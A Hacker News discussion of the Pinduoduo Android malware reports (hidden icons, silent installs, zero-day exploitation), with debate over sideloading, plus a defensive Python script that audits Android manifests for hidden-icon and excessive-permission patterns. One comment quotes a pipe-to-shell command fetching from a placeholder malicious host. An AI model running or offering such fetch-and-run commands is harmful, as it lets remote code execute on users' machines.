Chinese apps, even those from big established players, are often indistinguishable from malware. Off the top of my head, I can think of:
- Hiding their app icon from the launcher, but adding a widget that looks the same. So if the user tries to uninstall the app, they just delete the widget and the app remains.
- One app would install other apps from the same company in the background without user consent.
- Multiple apps will wake each other so they always stay in the background and become impossible to kill.
- Requesting every permission under the sun and transmitting as much info to the mothership as possible.
- Secretly turning on the camera and filming their users.
However, these only happen on the Android version. The iOS version never has these issues.
So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and be available only via direct download?)
Well, apps that don't have a declared launchable (homescreen) UI don't get these icons. Granted, it has been abused by spyware apps to "hide" from unsuspecting users, but you'll find these in Android's Settings app.
> One app would install other apps from the same company in the background without user consent.
I doubt installation without user consent is possible at all in Android 9+. Afaik, only Google PlayStore (or other OEM embedded stores) have permissions to silent install, as it were. And I haven't seen anyone allege PlayStore silently installing apps. See also: https://www.xda-developers.com/android-14-background-install...
> Multiple apps will wake each other so they always stay in the background and become impossible to kill
One can Force Stop an app to make sure no component (service, activity, receivers, or resolvers) can run in the background, until the user explicitly starts the app process again via the Launcher.
Android also limits background processes, tracks per-app CPU and memory use to limit it, and "caches" processes aggressively if need be (puts their threads to sleep so they aren't executing anything but could be resumed quickly).
> Requesting every permission under the sun and transmit as much info to the mothership as possible
The Trust on First Use model has been taken to the cleaners by Android apps hell-bent on tracking their users. Starting with Android 12, though, Android auto-removes permissions granted to installed apps the user hasn't interacted with.
> Secretly turning on the camera and film their users
Android 13+ has camera and mic indicators. And for earlier versions, even if inconvenient for end users to set up, there exist open source apps that continuously log cam or mic access from other apps.
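A defender-side check for the launcher-icon and permission patterns discussed in this thread, as an added example (not code from the thread or any commenter): it parses a decoded AndroidManifest.xml, as apktool produces, and flags an app that declares no enabled launcher activity but does declare a home-screen widget, and one that requests many dangerous permissions. It goes slightly beyond the comment above by also treating a launcher activity marked android:enabled="false" as hidden; the sample manifest, package name and the four-permission threshold are constructed assumptions.

```python
import xml.etree.ElementTree as ET
ANDROID_NS = "http://schemas.android.com/apk/res/android"

def attr(name):
    """Qualify an attribute with the android: namespace the way ElementTree expects."""
    return f"{{{ANDROID_NS}}}{name}"

# Subset of Android's runtime ("dangerous") permissions; a real audit would use the full list.
DANGEROUS = {
    "android.permission.CAMERA", "android.permission.RECORD_AUDIO",
    "android.permission.READ_CONTACTS", "android.permission.ACCESS_FINE_LOCATION",
    "android.permission.READ_SMS", "android.permission.READ_PHONE_STATE",
}

def filter_names(component, child_tag):
    """android:name values of <child_tag> elements inside the component's intent-filters."""
    return {e.get(attr("name"))
            for f in component.findall("intent-filter")
            for e in f.findall(child_tag)}

def has_launcher_activity(root):
    """True if an enabled activity or activity-alias declares MAIN + LAUNCHER (a home-screen
    icon). Components with android:enabled="false" are declared but never shown, so skip them."""
    for comp in root.iter():
        if comp.tag not in ("activity", "activity-alias"):
            continue
        if comp.get(attr("enabled"), "true") == "false":
            continue
        if ("android.intent.action.MAIN" in filter_names(comp, "action")
                and "android.intent.category.LAUNCHER" in filter_names(comp, "category")):
            return True
    return False

def has_app_widget(root):
    """True if some receiver handles APPWIDGET_UPDATE, i.e. the app offers a home-screen widget."""
    return any("android.appwidget.action.APPWIDGET_UPDATE" in filter_names(r, "action")
               for r in root.iter("receiver"))

def audit_manifest(xml_text):
    """Return a list of findings for the patterns in the thread's checklist."""
    root = ET.fromstring(xml_text)
    findings = []
    if not has_launcher_activity(root):
        findings.append("no enabled launcher activity: app gets no home-screen icon")
        if has_app_widget(root):
            findings.append("widget but no launcher icon: matches the fake-icon pattern")
    requested = {e.get(attr("name")) for e in root.findall("uses-permission")}
    dangerous = sorted(requested & DANGEROUS)
    if len(dangerous) >= 4:  # threshold is an assumption, not an Android rule
        findings.append(f"requests {len(dangerous)} dangerous permissions: {', '.join(dangerous)}")
    return findings

# Constructed sample: launcher activity disabled, widget present, broad permissions.
SUSPICIOUS = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.shop">
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application>
    <activity android:name=".Main" android:enabled="false">
      <intent-filter><action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/></intent-filter>
    </activity>
    <receiver android:name=".FakeIconWidget">
      <intent-filter><action android:name="android.appwidget.action.APPWIDGET_UPDATE"/></intent-filter>
    </receiver>
  </application>
</manifest>"""
print(*audit_manifest(SUSPICIOUS), sep="\n")
```

Static manifest checks only catch what is declared; an app can also hide its icon at runtime by disabling the launcher component, which needs a dynamic check on the device.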
The security argument for the App Store has never been stronger.
> "But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and be available only via direct download?
> I am really really afraid that by allowing third party app stores and sideloading
please stop it. I do not want my devices to become a toaster. I am a computer programmer. I would like the ability to write programs for my own personal use, and run those on my own devices THAT I PAID FOR. please stop pushing some narrative that will take this ability away from me.
> ("But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and be available only via direct download?)
Personal freedom always has personal responsibility attached. If you direct download it and it's malicious, well, that's your own problem. Probably should've thought about it better.
If you don't want to think about security, all you have to do is only install apps that are in the app store. Why should everyone else be restricted from doing whatever they want with their phones?
> So even though I am not a fan of the Apple monopoly, I am really really afraid that by allowing third party app stores and sideloading, the western apps will race to the bottom and become just like this.
This did not happen with Windows, so why would it happen with Android, which is much more restrictive in terms of permissions?
(Off topic, but does someone know a good alternative to imgur? The website currently autoplays unrelated videos, freezes my mobile browser for several seconds, and appears to hijack the back button. It feels like malware.)
To be fair, there are plenty of legitimate reasons to hire a reverse engineer. Maybe you're building a red team to your AppSec blue team, or you want to analyze the apps of your competitors, or any apps at the top of the App Store (you'd be shocked at the dark patterns you can uncover by looking at newly trending apps).
Maybe because I'm from a different era, but installing anything on a device from a website is an extremely risky game. There is a reason we moved toward using a web browser for functionality that was typically done on the desktop.
I'm not one to worship Google's walled garden (which is just marketing jargon), but at least that has some layer of verification and malware detection.
I still dream of a web app based future. Then we only need to security proof 1 app.
> A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.
> Maybe because I'm from a different era, but installing anything on a device from a website is an extremely risky game
You are (just like me) from a different era. /s
I was trying to compile rust (for mozilla) and I was shocked to see that it connects to the internet during the build process to download crates (I presume these are some kind of libraries). Then you have js with npm and the menu is served.
Even if the web browser has a container, this can be compromised during the build process.
That's like saying "in a native-based future we only need to security proof the OS". There's no free lunch, you always need to check both the sandbox layer and the application.
Which era is that, though? There was a decently-long stretch of time between shrink-wrap software being common (I think my last boxed software purchase was probably in the late 90s), and the advent of the App Store (2008). During that time, downloading things from a website was the primary method of installing software.
Also, it's not like people were installing this app from a random sketchy website; it appears to have been available on third-party Android app stores, which are the only option in China, since the Google Play Store isn't allowed there.
> I still dream of a web app based future.
Right there with you, but sadly, I don't think it's a realistic hope.
With the capabilities web apps have gathered over the years, I don't feel very comfortable with using random web apps either. As an added downside, random blog posts and ad iframes can now try to access the same APIs real web apps can. The more we move to a web app based reality, the more we're going to see exploitation of browsers and their many features.
We'll never get our one security proof app because security proof apps can't do things like rendering and file manipulation at acceptable speeds.
Downloading apps from websites is almost always a red flag in my opinion. If an app can't be in Google's app store for whatever reason, it surely can appear in another.
The only APKs I've downloaded come from Github/Gitlab because open source apps aren't always on F-Droid, and APKmirror because my phone is rooted, and I consider myself to be a power user. I'm really surprised an app like this is popular enough to get downloaded installs at all, though perhaps the Chinese app ecosystem is different enough that I simply can't understand.
I'd hate to have to resort to web apps for absolutely everything on my phone. Messengers and such need optimisations for battery usage and resources, and browsers don't offer any of that. The overhead of web applications is also quite significant. Don't get me wrong, I use several web apps for small things like weather sites and a simple game here or there, but there has to be room for both or the mobile experience will get worse for everyone.
therefore I can't download Netflix from Google Play for some absolutely idiotic reason even though the stupid app works perfectly afterwards. They just hate me for wanting to sync my clipboard automatically, I'm guessing.
> Lookout’s forensic analysis of two Pinduoduo APK app samples released prior to March 5 ... has determined that both contain malicious code that exploits CVE-2023-20963, the Android privilege-escalation vulnerability that wouldn’t become public until March 6 and wouldn’t be patched in user devices for up to two weeks later.
Temu (Pinduoduo's American app) appears to be unaffected and is still #1 on the app store and even has an "Editors Choice" badge, but with their parent company risking reputational harm on their main app I would be cautious.
Google should block all of their app signing keys, and only allow new ones when PDD can explain how malicious software was signed with the previous ones.
> Pinduoduo's core value is "本分" (Ben Fen). It is difficult to express it perfectly in English, but it essentially means to adhere firmly to one's own duties and principles. There are several layers of meaning here:
> Be honest and trustworthy;
> Discharge our own duties and responsibilities regardless of others' conduct;
> Never take advantage of others even when we are in a position to do so;
> Self-reflect and take responsibilities when problems arise instead of blaming others.
I guess the company's app developers never got the memo.
This is a refreshingly honest core value. To me, 本分 is better translated as "know your place". I.e. don't be ambitious, don't step out of line and always do exactly what the boss tells you to do, never a stroke more.
> The source[0] has a clearer description of what is currently being exploited: In the end, the Internet vendor used the above-mentioned series of concealed hacking techniques to achieve:
> - Concealed installation, increasing installed capacity
> - Counterfeit boost of DAU/MAU
> - Users cannot uninstall
> - Attacking competitor apps
> - Stealing user privacy data
> - Evasion of privacy compliance regulations
> and other suspected illegal purposes.
These fake apps were signed with the signing key of the official PinDuoDuo app. Until PinDuoDuo can explain how this signing key was "stolen" they are to blame for creating this malware.
The EvilParcel saga seems quite tragic. You would think after the first few repeats they would have taken some stronger measures than patch up the new API misuse case of the day.
Anyone from China or informed enough can chip in how secure the marketplace is? How often does this happen? I had my own problems with a Chinese developed app I needed to add some content for a client.
It's interesting how the headline writer chose to include "from China". If the developer had been French or American, would they have included "from France" or "from America"?
From the article:
The malicious versions of the Pinduoduo app were available in third-party markets, which users in China and elsewhere rely on because the official Google Play market is off-limits or not easy to access. No malicious versions were found in Play or Apple’s App Store. Last Monday, TechCrunch reported that Pinduoduo was pulled from Play after Google discovered a malicious version of the app available elsewhere. TechCrunch reported the malicious apps available in third-party markets exploited several zero-days, vulnerabilities that are known or exploited before a vendor has a patch available.
As far as I know, China is the only country that has 3rd-party Android app markets of that size because Google Play is literally not allowed there. So I don't think this would be a significant story anywhere else in the world.
It's a company with 750M MAU, so very large but still not something most US readers would be aware of. If it was a French or US developer, they would have just used the name of it.
ignoramous | 3 years ago
None of this is perfect, mind you; but I wanted to point out that Android has been responding to growing privacy concerns: https://security.googleblog.com/2022/12/app-defense-alliance...
otterley | 3 years ago
> "But you can always download from the official App Store!" you may say. But what if, say, Tik Tok announces they will from now on leave the App Store and available only via direct download?
... and nothing of value was lost.
saagarjha | 3 years ago
This is not true. It’s much rarer but there’s nothing special about iOS in this regard when it comes to abusing 0-days.
secondcoming | 3 years ago
It was pretty much impossible on Symbian OS.
jonatron | 3 years ago
Edit: Replaced imgur link
2OEH8eoCRo0 | 3 years ago
> A new set of Android malware, phishing, and adware apps have infiltrated the Google Play store, tricking over two million people into installing them.
https://lifehacker.com/great-now-the-apple-app-store-has-mal...
> Security researchers found malware in several popular App Store apps.
SoftTalker | 3 years ago
curl https://malicious.example.com/useful_thing | bash
and its variants?
jgalt212 | 3 years ago
> Google patched in updates that became available to end users two weeks ago.
lalopalota | 3 years ago
Looks like they nailed that one.
[0] https://mp.weixin.qq.com/s/P_EYQxOEupqdU0BJMRqWsw
akira2501 | 3 years ago
The actual monopoly they enjoy or the remote control of my devices aren't the real solutions to this problem.